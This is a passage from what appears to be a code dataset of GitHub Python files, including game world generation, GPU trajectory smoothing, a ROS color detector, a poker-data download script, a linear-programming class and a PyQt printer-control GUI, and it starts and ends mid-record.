GenerateSeed()\r\n\tLoadWorldAroundPostition(Player.GetAbsoluteCoords())\r\n\tDatabase.Commit()\r\n\r\n#\tprint(map[128][128])\r\n\r\ndef LoadWorldAroundPostition(coords, radius = 100):\r\n\tfor x in range (coords[0]-radius, coords[0]+radius):\r\n\t\tfor y in range (coords[1]-radius, coords[1]+radius):\r\n\t\t\tLoadWorld((x,y))\r\n\r\n\r\ndef PostInit(background):\r\n\tglobal background_block_x, background_block_y, background_block_x_center, background_block_y_center\r\n\tbackground_block_x = background[0]\r\n\tbackground_block_y = background[1]\r\n\tbackground_block_x_center = background_block_x//2\r\n\tbackground_block_y_center = background_block_y//2\r\n\r\ndef CalcChunk(player_coords_float, direction):\r\n\tglobal background_block_x, background_block_y, background_block_x_center, background_block_y_center\r\n\tplayer_coords = (math.trunc(player_coords_float[0]), math.trunc(player_coords_float[1]))\r\n\tif direction == \"north\":\r\n\t\tfor x in range (player_coords[0]-background_block_x_center-2, player_coords[0]+background_block_x_center+2):\r\n\t\t\tpos = str(x)+':'+str(player_coords[1]-background_block_y_center-1)\r\n\t\t\tif not pos in map.keys():\r\n\t\t\t\tLoadWorld((x, player_coords[1]-background_block_y_center-1))\r\n\telif direction == \"south\":\r\n\t\tfor x in range (player_coords[0]-background_block_x_center-2, player_coords[0]+background_block_x_center+2):\r\n\t\t\tpos = str(x)+':'+str(player_coords[1]+background_block_y_center+1)\r\n\t\t\tif not pos in map.keys():\r\n\t\t\t\tLoadWorld((x, player_coords[1]+background_block_y_center+1))\r\n\t\t\t#print(pos)\r\n\telif direction == \"east\":\r\n\t\tfor y in range (player_coords[1]-background_block_y_center-2, player_coords[1]+background_block_y_center+2):\r\n\t\t\tpos = str(player_coords[0]+background_block_x_center+1)+':'+str(y)\r\n\t\t\tif not pos in map.keys():\r\n\t\t\t\tLoadWorld((player_coords[0]+background_block_x_center+1, y))\r\n\telif direction == \"west\":\r\n\t\tfor y in range (player_coords[1]-background_block_y_center-2, player_coords[1]+background_block_y_center+2):\r\n\t\t\tpos = str(player_coords[0]-background_block_x_center-1)+':'+str(y)\r\n\t\t\tif not pos in map.keys():\r\n\t\t\t\tLoadWorld((player_coords[0]-background_block_x_center-1, y))\r\n\r\ndef GetElement(coords):\r\n\tglobal map\r\n\tpos = str(coords[0])+':'+str(coords[1])\r\n\tif not pos in map.keys():\r\n\t\t#print(\"Erreur à la position:\", pos)\r\n\t\treturn 0\r\n\telse:\r\n\t\treturn map[pos]\r\n\r\ndef LoadWorld(coords):\r\n\telement = Database.GetElement(coords)\r\n\tif element != None:\r\n\t\tmap[str(coords[0])+':'+str(coords[1])] = element\r\n\telse:\r\n\t\tGenerateWorld(coords)\r\n\r\ndef DeleteWorld():\r\n\tglobal map, rando1, rando2\r\n\tDatabase.DeleteWorldData()\r\n\tInit()\r\n\tBackground.CalcPositions()\r\n\r\ndef GenerateSeed(type = \"sinusoid\"):\r\n\tobj_seed = {\r\n\t\t\"type\" : \"sinusoid\",\r\n\t\t\"number\" : random.randint(1, 4),\r\n\t\t\"random\" : []\r\n\t}\r\n\r\n\tif type == \"sinusoid\":\r\n\t\tfor loop in range (obj_seed[\"number\"]):\r\n\t\t\tobj_seed[\"random\"].append(0.5+random.random()*random.randint(3, 20))\r\n\t\tDatabase.SaveWorldSeed(obj_seed)\r\n\t\treturn obj_seed\r\n\r\n\r\ndef GenerateWorld(coords):\r\n\tglobal map\r\n\tdistance_init = math.sqrt((coords[0])**2+(coords[1])**2)\r\n\tdistance = 0\r\n\tfor loop in range (obj_seed[\"number\"]):\r\n\t\tdistance += math.cos(obj_seed[\"random\"][loop]*distance_init)\r\n\r\n\tif distance >= 0:\r\n\t\telement = 1\r\n\telse:\r\n\t\telement = 2\r\n\r\n#\telement = 
random.randint(0,1)\r\n\tmap[str(coords[0])+':'+str(coords[1])] = element\r\n\tDatabase.AddElementToMap((coords[0], coords[1], element))\r\n","repo_name":"antoinech2/Factinfinity","sub_path":"id1.1.8/world.py","file_name":"world.py","file_ext":"py","file_size_in_byte":3704,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"46238769635","text":"#utils that unwrap and smooth trajectories on the gpu\n#Programmer: Tim Tyree\n#Date: 9.29.2021\nimport numpy as np, cupy as cp, numba.cuda as cuda, cudf#, pandas as pd\n\ndef unwrapper_pbc(incol, outcol, jump_thresh, width):\n '''\n Example Usage: for cudf.DataFrame instance\n df['incol']=df['x']\n grouped = df.groupby(pid_col)\n df = grouped.apply_grouped(unwrapper_pbc,\n incols=['incol'],\n outcols=dict(outcol=np.float64), jump_thresh=width/2)\n df['dx_unwrap']=df['outcol']\n df.head()\n '''\n e=incol\n de_unwrap=outcol\n for i in range(cuda.threadIdx.x, len(e), cuda.blockDim.x):\n de_unwrap[i]=0\n if i>0:\n de=e[i]-e[i-1]\n jump_plus=de<-jump_thresh\n jump_minus=de>jump_thresh\n if jump_plus:\n de_unwrap[i]=width\n elif jump_minus:\n de_unwrap[i]=-width\n\ndef rolling_avg(incol, outcol, win_size):\n e=incol\n rolling_avg_e=outcol\n for i in range(cuda.threadIdx.x, len(e), cuda.blockDim.x):\n if i < win_size - 1:\n # if there is not enough data to fill the window, take the average to be nan\n rolling_avg_e[i] = np.nan\n else:\n total = 0\n for j in range(i - win_size + 1, i + 1):\n total += e[j]\n rolling_avg_e[i] = total / win_size\n\ndef rolling_diff(incol, outcol, win_size=2):\n e=incol\n rolling_diff_e=outcol\n for i in range(cuda.threadIdx.x, len(e), cuda.blockDim.x):\n if i < win_size - 1:\n # if there is not enough data to fill the window, take the average to be nan\n rolling_diff_e[i] = np.nan\n else:\n j=i - win_size + 1\n rolling_diff_e[i] = e[i]-e[j]\n\ndef apply_unwrap_xy_trajectories_pbc(df,t_col,pid_col,width,height,**kwargs):\n #now we only have good data... we can compute moving averages for each particle!\n #allocate memory\n df['dx_unwrap']=0.*df['x']\n df['dy_unwrap']=0.*df['y']\n df['x_unwrap']=df['x']\n df['y_unwrap']=df['y']\n #TODO(optional): reset the index... not needed and ruins reconstruction of dropped columns at the end... 
don't do it...\n # df.reset_index(inplace=True)\n #apply unwrapping to x and y\n df['incol']=df['x']\n grouped = df.groupby(pid_col)\n uwargs={'jump_thresh':width/2,\"width\":width}\n df = grouped.apply_grouped(unwrapper_pbc,\n incols=['incol'],\n outcols=dict(outcol=np.float64), kwargs=\n uwargs)\n df['dx_unwrap']=df['outcol']\n\n df['incol']=df['y']\n grouped = df.groupby(pid_col)\n uwargs={'jump_thresh':height/2,\"width\":height}\n df = grouped.apply_grouped(unwrapper_pbc,\n incols=['incol'],\n outcols=dict(outcol=np.float64), kwargs=\n uwargs)\n df['dy_unwrap']=df['outcol']\n\n df.drop(columns=['incol','outcol'],inplace=True)\n\n #DONE: confirmed ^that was nontrivial and reasonable looking\n # (df['dx_unwrap']!=0).any(),(df['dy_unwrap']!=0).any()\n # df[df['dx_unwrap']!=0].head()\n # (True,True)\n\n #aggregte over jumps\n grouped_unwrap=df.groupby(pid_col)\n\n #aggregate along a given columns in grouped_unwrap\n result=grouped_unwrap[['dx_unwrap','dy_unwrap']].cumsum()\n\n #map result back onto df using reindexing ninjitsu\n cp_col_lst=['dx_unwrap','dy_unwrap']\n df.reset_index(inplace=True)\n result.reset_index(inplace=True)\n for col in cp_col_lst:\n df[col]=result[col]\n df.set_index('index',inplace=True)\n\n #compute unwrapped coordinates\n df['x_unwrap']=df['x']+df['dx_unwrap']\n df['y_unwrap']=df['y']+df['dy_unwrap']\n return df\n\ndef apply_moving_avg_xy_trajectories(df,t_col,pid_col,navg1,x_col='x_unwrap',y_col='y_unwrap',**kwargs):\n diffx_col='diff'+x_col\n diffy_col='diff'+y_col\n #apply smoothing to x and y after unwrapping\n df['incol']=df[x_col]\n grouped = df.groupby(pid_col)\n if navg1>0:\n mawargs={'win_size':navg1}\n df = grouped.apply_grouped(rolling_avg,\n incols=['incol'],\n outcols=dict(outcol=np.float64), kwargs=\n mawargs)\n df[x_col]=df['outcol']\n\n df['incol']=df[y_col]\n grouped = df.groupby(pid_col)\n df = grouped.apply_grouped(rolling_avg,\n incols=['incol'],\n outcols=dict(outcol=np.float64), kwargs=\n mawargs)\n df[y_col]=df['outcol']\n # else:\n # #perform no moving average if the window is of size zero\n # pass\n # #drop data that isn't needed anymore\n #DONE: verified that dropping data here doesn't affect the number of final nonnan values\n # df.drop(columns=['incol','outcol'],inplace=True)\n df.dropna(inplace=True)\n # df.head()\n\n #apply smoothing to x and y after unwrapping\n df['incol']=df[x_col]\n grouped = df.groupby(pid_col)\n mdwargs={'win_size':2}\n df = grouped.apply_grouped(rolling_diff,\n incols=['incol'],\n outcols=dict(outcol=np.float64), kwargs=\n mdwargs)\n df[diffx_col]=df['outcol']\n\n df['incol']=df[y_col]\n grouped = df.groupby(pid_col)\n df = grouped.apply_grouped(rolling_diff,\n incols=['incol'],\n outcols=dict(outcol=np.float64), kwargs=\n mdwargs)\n df[diffy_col]=df['outcol']\n\n #drop data that isn't needed anymore\n df.drop(columns=['incol','outcol'],inplace=True)\n # df.dropna(inplace=True)\n\n #compute the naive speed of the unwrapped trajectories in pixels per frame\n df['speed']=cp.sqrt(df[diffx_col]**2+df[diffy_col]**2)#pixels per frame\n # df['speed']=cp.sqrt(df['diffx_unwrap']**2+df['diffy_unwrap']**2)#pixels per frame#*DS/DT*10**3 #cm/s\n\n # #DONE: test and verify that the largest stepsize in the unwrapped xy is reasonable for both x and y\n # max_speed_values=df.groupby(pid_col)['speed'].max().values\n # plt.hist(max_speed_values.get(),bins=30)\n # plt.xlabel('max pixel displacement between two frames')\n # max_speed_warning=20 #pixels per frame\n # assert ((max_speed_values.get()mid:\n l[k] = ll[j]\n j += 1\n 
elif j>high:\n l[k] = ll[i]\n i += 1\n elif ll[i] max_area:\n max_area = area\n max_contour = contour\n \n if max_contour is not None:\n x, y, w, h = cv2.boundingRect(max_contour)\n cx = x + w/2\n cy = y + h/2\n \n green_point = Point()\n green_point.x = cx\n green_point.y = cy\n green_point.z = 0\n \n self.coord_pub.publish(green_point)\n \n # Dibujar contorno en la imagen original\n cv2.rectangle(cv_image, (x, y), (x + w, y + h), (0, 255, 0), 2)\n \n # Mostrar imagen\n cv2.imshow(\"Green Object Detector\", cv_image)\n cv2.waitKey(1)\n\nif __name__ == '__main__':\n rospy.init_node('green_object_detector', anonymous=True)\n green_detector = GreenObjectDetector()\n try:\n rospy.spin()\n except KeyboardInterrupt:\n pass\n cv2.destroyAllWindows()\n","repo_name":"fercuellar/Interfaces","sub_path":"image_detector/green_detector.py","file_name":"green_detector.py","file_ext":"py","file_size_in_byte":2369,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"39740784198","text":"import logging\nimport time\nimport threading\n\n\nclass ResultWorker:\n _instance = None\n _resultClass = None\n _resultSenderObjectId = 0\n _resultObject = None\n _condition = threading.Condition()\n\n def __new__(cls, *args, **kwargs):\n if not cls._instance:\n cls._instance = super().__new__(cls, *args, **kwargs)\n return cls._instance\n\n def _setResultInfo(self, resultClass, resultSenderObjectId:int):\n '''print(\"resultInfo \" + str(resultClass) + \", ID \" + str(resultSenderObjectId))'''\n self._resultClass = resultClass\n self._resultSenderObjectId = resultSenderObjectId\n self._resultObject=None\n\n def waitForResult(self, timeoutInSeconds:int):\n start_time = time.time()\n end_time = start_time + timeoutInSeconds\n\n with self._condition:\n while self._resultObject == None and time.time() < end_time:\n self._condition.wait(1)\n\n return self._resultObject\n\n def waitForEvent(self, event, eventSenderObjectId, timeoutInSeconds:int):\n self._resultClass = event\n self._resultSenderObjectId = eventSenderObjectId\n self._resultObject=None\n \n start_time = time.time()\n end_time = start_time + timeoutInSeconds\n\n with self._condition:\n while self._resultObject == None and time.time() < end_time:\n self._condition.wait(1)\n\n return self._resultObject\n\n def busDataReceived(self, busDataMessage):\n '''print(\"got \"+str(busDataMessage))'''\n if (self._resultClass != None and busDataMessage.getSenderObjectId()==self._resultSenderObjectId and isinstance(busDataMessage.getData(), self._resultClass)):\n with self._condition:\n self._resultObject = busDataMessage.getData()\n self._condition.notify()\n","repo_name":"hausbus/homeassistant","sub_path":"pyhausbus/ResultWorker.py","file_name":"ResultWorker.py","file_ext":"py","file_size_in_byte":1691,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"8221322442","text":"#!/usr/bin/env python3\nimport os, datetime\nimport sqlite3 as lite\nfrom optparse import OptionParser\nfrom datetime import datetime\n\n# Initialise where database file is stored (in .bashrc)\nDB_FILE = os.environ['DB_FILE']\n\n# Information required to update database\nparser = OptionParser()\nparser.add_option(\"-o\", \"--obsid\", dest=\"obsid\", default=None, type=int, help=\"Observation's ID\")\nparser.add_option(\"-s\", \"--status\", dest=\"status\", default=\"Failed\", type=str, help=\"Status of observation in the pipeline (eg. 
completed, failed, etc.)\")\n\nopts, args = parser.parse_args()\n\n# At least the observation that is to be updated needs to be known\nif opts.obsid is None:\n parser.error(\"Obsid must be set\")\n\n# Time when processing of the observation has finished\nend_time = datetime.now()\n\nobsid=int(opts.obsid)\n\ncon = lite.connect(DB_FILE)\nwith con:\n cur = con.cursor()\n if opts.status == \"Failed\":\n cur.execute(\"UPDATE Log SET Ended=?, Status=? WHERE Obsid=?\", (end_time, opts.status, obsid))\n else:\n query = \"SELECT Started FROM Log WHERE Obsid=%d\" % (obsid)\n #cur.execute(\"SELECT Started FROM Log WHERE Obsid=?\", (opts.obsid))\n cur.execute(query)\n start_time = cur.fetchone()[0]\n start_time = datetime.strptime(start_time, '%Y-%m-%d %H:%M:%S.%f')\n time_diff = end_time - start_time\n diff = time_diff.total_seconds()\n cur.execute(\"UPDATE Log SET Ended=?, Time=?, Status=? WHERE Obsid=?\", (end_time, diff, opts.status, obsid))\n","repo_name":"johnsmorgan/asvo_bash_pipeline","sub_path":"db/db_end_log.py","file_name":"db_end_log.py","file_ext":"py","file_size_in_byte":1496,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"6584944409","text":"import os\nimport wget\n\nURL_TRAIN = 'https://archive.ics.uci.edu/ml/machine-learning-databases/poker/poker-hand-training-true.data'\nURL_TEST = 'https://archive.ics.uci.edu/ml/machine-learning-databases/poker/poker-hand-testing.data'\n\n\ndef main():\n\n if not os.path.exists('./data'):\n os.makedirs('./data')\n\n # We only demonstrate training for optimized hyperparameters here,\n # without validation.\n\n wget.download(URL_TRAIN, 'data/train_poker.csv')\n wget.download(URL_TEST, 'data/test_poker.csv')\n\nif __name__ == '__main__':\n main()\n","repo_name":"progrmanial/Google-AI-Research","sub_path":"tabnet/download_prepare_poker.py","file_name":"download_prepare_poker.py","file_ext":"py","file_size_in_byte":540,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"75"} +{"seq_id":"34370080837","text":"from typing import List\n\nfrom Abstract import equation, lpp\nfrom Abstract.lpp import LPP\nfrom Abstract.equation import Equation\nfrom Abstract.outputHandler import OutputHandler\n\n\nclass SimpleLPP(LPP):\n \"\"\"\n Concrete simple LPP class based on APM236.\n \"\"\"\n objective: Equation\n constraints: List[Equation]\n is_max: bool\n variables: List\n outputter: OutputHandler\n\n def __init__(self, objective, constraints, is_max, outputter):\n var_lst = []\n var_lst += objective.get_vars()\n for const in constraints:\n var_lst += const.get_vars()\n\n variables = set(var_lst)\n\n self.variables = list(variables)\n self.outputter = outputter\n self.is_max = is_max\n\n # TODO: add some sort of testing for the inputs to be in either standard form or canonical form\n self.constraints = constraints\n self.objective = objective\n\n def get_form(self):\n simp, non_simp, valid = self.get_simple_constraints()\n if valid:\n canonical_bool = all([const.get_type() == equation.EQ for const in non_simp])\n standard_bool = all([const.get_type() == equation.LEQ for const in non_simp])\n if canonical_bool:\n return lpp.CANONICAL\n elif standard_bool:\n return lpp.STANDARD\n else:\n return lpp.UNKNOWN\n\n def get_free_variables(self) -> List:\n simples = []\n seen = []\n for const in self.constraints:\n valid_type = (const.get_type() == equation.GEQ) or (const.get_type() == equation.LEQ)\n if const.get_rhs() == 0 and valid_type:\n mask = [None] * 
(len(self.variables) - 1)\n expected = [0] * (len(self.variables) - 1) + [1]\n for var in self.variables:\n new_mask = mask + [var]\n if const.get_array_form(new_mask) == expected:\n simples.append(const)\n seen.append(var)\n break\n return [x for x in self.variables if x not in seen]\n\n def get_simple_constraints(self):\n simples = []\n not_simples = []\n seen = []\n for const in self.constraints:\n added = False\n valid_type = (const.get_type() == equation.GEQ) or (const.get_type() == equation.LEQ)\n if const.get_rhs() == 0 and valid_type:\n mask = [None] * (len(self.variables) - 1)\n expected = [0] * (len(self.variables) - 1) + [1]\n for var in self.variables:\n new_mask = mask + [var]\n if const.get_array_form(new_mask) == expected:\n simples.append(const)\n seen.append(var)\n added = True\n break\n if not added:\n not_simples.append(const)\n\n return simples, not_simples, all([x in self.variables for x in seen])\n\n def compacted_output(self):\n if self.is_max:\n self.outputter.write(\"Maximize:\")\n else:\n self.outputter.write(\"Minimize:\")\n\n self.outputter.write_eq(self.objective)\n self.outputter.write(\"\\nSubject to:\")\n\n simp, non_simp, result = self.get_simple_constraints()\n for const in non_simp:\n self.outputter.write_eq(const)\n self.outputter.write(\"\\nWhere:\")\n if result:\n varibs = ','.join([str(x) for x in self.variables])\n self.outputter.write(varibs + \" \" + equation.GEQ + \" 0\")\n else:\n for const in simp:\n self.outputter.write_eq(const)\n\n def output(self):\n if self.is_max:\n self.outputter.write(\"Maximize:\\n\")\n else:\n self.outputter.write(\"Minimize:\\n\")\n self.outputter.write_eq(self.objective)\n self.outputter.write(\"\\nSubject to:\")\n for const in self.constraints:\n self.outputter.write_eq(const)\n\n def set_objective(self, new_objective: Equation):\n assert all([var in self.variables for var in new_objective.get_vars()])\n self.objective = new_objective\n\n def get_objective(self):\n return self.objective\n\n def set_constraints(self, constraints: List[Equation]):\n for const in constraints:\n assert all([var in self.variables for var in const.get_vars()])\n self.constraints = constraints\n\n def get_constraints(self):\n return self.constraints\n\n def get_is_max(self):\n return self.is_max\n\n def set_is_max(self, new_max: bool):\n self.is_max = new_max\n\n def get_variables(self):\n return sorted(self.variables, key=lambda x: str(x))\n","repo_name":"VijayS02/LPPy","sub_path":"LPPy/simpleLPP.py","file_name":"simpleLPP.py","file_ext":"py","file_size_in_byte":4741,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"20087453127","text":"nums = []\nwith open('day9_input.txt') as file:\n line = file.readline().replace('\\n', '')\n\n while line:\n nums.append(int(line))\n line = file.readline().replace('\\n', '')\n#print(len(nums))\nidx = 25\n#print(nums[idx])\nwhile True:\n good = False\n for j in range(0, 25):\n for k in range(0, 25):\n #print(nums[k+idx-25] + nums[j+idx-25])\n if (nums[k+idx-25] + nums[j+idx-25] == nums[idx]):# and (j != idx) and (k != idx):\n good = True\n break\n \n if good:\n idx = idx + 1\n else:\n break\n if 24 + idx >= len(nums): break\nprint(nums[idx])\nkey = nums[idx]\n\n\nidx = 0\nfirst = idx\ntotal = 0\nwhile True:\n total = total + nums[idx + first]\n if total >= key:\n if total == key:\n weakness = min(nums[first:idx + first+1]) + max(nums[first:idx + first+1])\n break\n else:\n first = first + 1\n idx = 0\n total = 0\n else:\n idx = idx + 1\n 
\n\nprint(weakness)\n","repo_name":"cantudo/aoc","sub_path":"day9/day9.py","file_name":"day9.py","file_ext":"py","file_size_in_byte":1028,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"17953357768","text":"#!/usr/bin/env python\n'''Shopbot GUI functions for setting up the GUI window'''\n\n# external packages\nfrom PyQt5.QtCore import pyqtSignal, QObject, QThread, QTimer, QThreadPool\nfrom PyQt5.QtGui import QFont\nfrom PyQt5.QtWidgets import QAction, QApplication, QGridLayout, QMainWindow, QWidget\nimport os, sys\nimport ctypes\nfrom typing import List, Dict, Tuple, Union, Any, TextIO\nimport logging\nimport traceback\nimport csv\nimport datetime\n\n\n# local packages\nfrom general import *\nfrom settings import *\nfrom log import *\nimport fluigent\nimport files\nimport shopbot\nimport cameras\nimport calibration\nimport sbprint\nimport flags\nimport convert\nfrom config import cfg\n\ncurrentdir = os.path.dirname(os.path.realpath(__file__))\nparentdir = os.path.dirname(currentdir)\nsys.path.append(currentdir)\nsys.path.append(parentdir)\nfrom sbpRead import SBPHeader\n \n####################### the whole window\n\nclass SBwindow(QMainWindow):\n '''The whole GUI window'''\n \n def __init__(self, parent=None, meta:bool=True, sb:bool=True, flu:bool=True, cam:bool=True, file:bool=True, calib:bool=True, convert:bool=True, uv:bool=True, test:bool=False):\n super(SBwindow, self).__init__(parent)\n \n # initialize all boxes to empty value so if we hit an error during setup and need to disconnect, we aren't trying to call empty variables\n\n self.arduino = flags.arduino(connect=False)\n self.fileBox = files.fileBox(self, connect=False)\n self.sbBox = shopbot.sbBox(self, self.arduino, connect=False) \n self.fluBox = fluigent.fluBox(self, self.arduino, connect=False)\n self.logDialog = None\n self.camBoxes = cameras.camBoxes(self, connect=False)\n self.metaBox = sbprint.metaBox(self, connect=False) \n self.flagBox = flags.flagGrid(self, tall=False)\n self.settingsDialog = QDialog()\n self.save = False\n self.convertDialog = QDialog() \n self.calibDialog = QDialog()\n \n self.meta = meta\n self.sb = sb\n self.uv = uv\n self.flu = flu\n self.cam = cam\n self.test = test\n self.file = file\n self.calib = calib\n self.convert = convert\n\n try:\n self.central_widget = QWidget() \n self.setCentralWidget(self.central_widget) # create a central widget that everything else goes inside\n\n self.setWindowTitle(\"NIST Direct-write printer\")\n self.setStyleSheet('background-color:white;')\n \n# self.resize(1500, 1600) # window size\n self.connect()\n self.createGrid() # create boxes to go in main window\n self.createMenu() # create menu bar to go at top of window\n # createMenu must go after createGrid, because it uses features created in createGrid\n\n logging.info('Window created. GUI is ready.')\n except Exception as e:\n logging.error(f'Error during initialization: {e}')\n traceback.print_exc()\n self.closeEvent(0) # if we fail to initialize the GUI, disconnect from everything we connected\n \n \n def boxes(self) -> List:\n b = []\n\n for s in ['settingsDialog', 'logDialog', 'convertDialog', 'fileBox', 'sbBox', 'fluBox', 'calibDialog', 'metaBox', 'flagBox']:\n if hasattr(self, s):\n b.append(getattr(self, s))\n if hasattr(self, 'camBoxes'):\n b = b+self.camBoxes.list\n return b\n\n \n def connect(self) -> None:\n '''create the boxes. sbBox loads features from fluBox and camBoxes. fileBox loads features from sbBox and camBoxes. 
'''\n \n if self.uv or self.sb and hasattr(self, 'arduino'):\n print('Connecting Arduino')\n self.arduino.signals.status.connect(self.updateStatus)\n self.arduino.connect()\n \n if self.flu and hasattr(self, 'fluBox'):\n print('Connecting Fluigent box')\n self.fluBox.connect() # fluigent box\n \n if self.cam and hasattr(self, 'camBoxes'):\n print('Connecting camera boxes')\n self.camBoxes.connect() # object that holds camera boxes\n \n if self.sb and hasattr(self, 'sbBox'):\n print('Connecting shopbot box')\n self.sbBox.connect() # shopbot box\n else:\n print('Loading shopbot test layout')\n self.sbBox.testLayout(self.flu)\n\n if self.file and hasattr(self, 'fileBox'):\n print('Connecting file box')\n self.fileBox.connect() # general file ops\n\n if self.meta and hasattr(self, 'metaBox'):\n print('Connecting metadata box')\n self.metaBox.connect() # metadata box\n \n self.flagBox.labelFlags() # relabel flags now that we've connected all the boxes\n \n\n \n def createGrid(self):\n '''Create boxes that go inside of window'''\n\n # use different layout depending on screen resolution\n user32 = ctypes.windll.user32\n width = user32.GetSystemMetrics(0)\n height = user32.GetSystemMetrics(1)\n\n self.fullLayout = QGridLayout()\n self.fullLayout.addWidget(self.sbBox, 0, 0) \n self.fullLayout.addWidget(self.fileBox, 0, 1) # row 0, col 1\n \n if height<2000:\n logging.info('Low screen resolution: using wide window')\n # short window\n self.fullLayout.addWidget(self.fluBox, 0,2)\n self.fluBox.small()\n row = 2\n col = 0\n for camBox in self.camBoxes.list:\n self.fullLayout.addWidget(camBox, row, col)\n col+=1\n if col==3:\n row+=1\n col = 0\n self.move(max(50, int(width-3600)),50)\n else:\n # tall window\n self.fullLayout.addWidget(self.fluBox, 2,0)\n row = 2\n col = 1\n for camBox in self.camBoxes.list:\n self.fullLayout.addWidget(camBox, row, col)\n col+=1\n if col==2:\n row+=1\n col=0\n self.move(max(50, int(width-2800)),50)\n\n self.central_widget.setLayout(self.fullLayout)\n\n \n #----------------\n # log\n \n def setupLog(self, menubar) -> None: \n '''Create the log dialog.'''\n self.logDialog = logDialog(self)\n self.logButt = QAction('Log', self)\n self.logButt.setStatusTip('Open running log of status messages')\n self.logButt.triggered.connect(self.openLog)\n menubar.addAction(self.logButt) # add button to open log window\n \n def openLog(self) -> None:\n '''Open the log window'''\n self.logDialog.show()\n self.logDialog.raise_()\n \n @pyqtSlot(str,bool)\n def updateStatus(self, st:str, log:bool) -> None:\n '''update the displayed device status'''\n if log:\n logging.info(st)\n \n #----------------\n # settings\n \n def setupSettings(self, menubar) -> None: \n '''Create the settings dialog.'''\n self.settingsDialog = settingsDialog(self)\n self.settingsButt = QAction(icon('settings.png'), 'Settings', self)\n self.settingsButt.setStatusTip('Open app settings')\n self.settingsButt.triggered.connect(self.openSettings)\n menubar.addAction(self.settingsButt) # add button to open settings window\n \n def openSettings(self) -> None:\n '''Open the settings window'''\n self.settingsDialog.show()\n self.settingsDialog.raise_()\n \n #-------------- \n # calibration tool\n \n def setupCalib(self, menubar) -> None:\n '''Create the pressure calibration tool dialog'''\n if self.calib:\n self.calibDialog = calibration.pCalibration(self)\n self.calibButt = QAction('Speed calibration tool', self)\n self.calibButt.setStatusTip('Tool for calibrating speed vs pressure')\n 
self.calibButt.triggered.connect(self.openCalib)\n menubar.addAction(self.calibButt) # add button to open calibration window\n \n def openCalib(self) -> None:\n '''Open the calibration window'''\n self.calibDialog.show()\n self.calibDialog.raise_()\n \n #----------------\n # Convert\n\n def setupConvert(self, menubar) -> None:\n '''Create the convert dialog'''\n if self.convert:\n self.convertDialog = convert.convertDialog(self)\n self.convertButt = QAction('Convert', self)\n self.convertButt.setStatusTip('Convert .gcode file to .sbp')\n self.convertButt.triggered.connect(self.openConvert)\n menubar.addAction(self.convertButt) # add button to open convertion window\n \n def openConvert(self) -> None:\n '''Open the conversion window'''\n self.convertDialog.show()\n self.convertDialog.raise_()\n \n \n #----------------\n # top menu\n \n def createMenu(self):\n '''Create the top menu of the window'''\n menubar = self.menuBar()\n self.setupLog(menubar) # create a log window, not open yet\n self.setupCalib(menubar)\n self.setupConvert(menubar)\n self.setupSettings(menubar) # create a log window, not open yet\n if self.test:\n self.setupDropTest(menubar)\n \n def setupDropTest(self, menubar):\n '''create test menu for dropped frames'''\n self.dropDialog = cameras.dropTestDialog(self)\n self.dropButt = QAction('Dropped frame tool', self)\n self.dropButt.triggered.connect(self.openDropTest)\n menubar.addAction(self.dropButt)\n \n def openDropTest(self) -> None:\n self.dropDialog.show()\n self.dropDialog.raise_()\n \n \n \n\n\n #-----------------\n # file names\n def newFile(self, deviceName:str, ext:str) -> Tuple[str, str]:\n '''Generate a new file name for device and with extension'''\n return self.fileBox.newFile(deviceName, ext)\n \n #----------------\n # metadata at print\n def saveMetaData(self) -> None:\n '''save metadata including print speeds, calibration values, presures, metadata'''\n try:\n fullfn = self.newFile('meta', '.csv')\n except NameError:\n self.updateStatus('Failed to save speed file', True)\n return\n \n \n\n with open(fullfn, mode='w', newline='', encoding='utf-8') as c:\n writer = csv.writer(c, delimiter=',', quotechar='\"', quoting=csv.QUOTE_MINIMAL)\n writer.writerow(['appid', '', cfg.appid])\n for box in self.boxes():\n if hasattr(box, 'writeToTable'):\n box.writeToTable(writer)\n \n self.sbBox.updateStatus(f'Saved {fullfn}', True)\n \n def flagTaken(self, flag0:int) -> bool:\n '''check if the flag is already occupied'''\n if hasattr(self, 'flagBox'):\n return self.flagBox.flagTaken(flag0)\n else:\n return False\n \n #----------------\n \n def getFileName(self) -> str:\n try:\n fullfn = self.newFile('time', '.csv')\n except NameError:\n self.fileName = ''\n return\n self.fileName = fullfn\n \n def initSaveTable(self, channelsTriggered:dict, runSimple:dict) -> None:\n '''initialize a table that saves data during a print'''\n if (hasattr(self, 'fluBox') and self.fluBox.savePressure) or (hasattr(self, 'sbBox') and self.sbBox.savePos):\n self.saveTable = []\n self.save = True\n self.ending = False\n self.getFileName() # determine the current file name\n self.tStart = datetime.datetime.now()\n self.timer = QTimer()\n self.channelsTriggered = channelsTriggered\n self.runSimple = runSimple\n self.timer.timeout.connect(self.readValues)\n self.timer.start(self.sbBox.saveFreq)\n \n \n def readValues(self) -> None:\n '''add values to the table'''\n if self.save:\n dnow = datetime.datetime.now()\n tnow = (dnow-self.tStart).total_seconds()\n if hasattr(self, 'fluBox'):\n plist = 
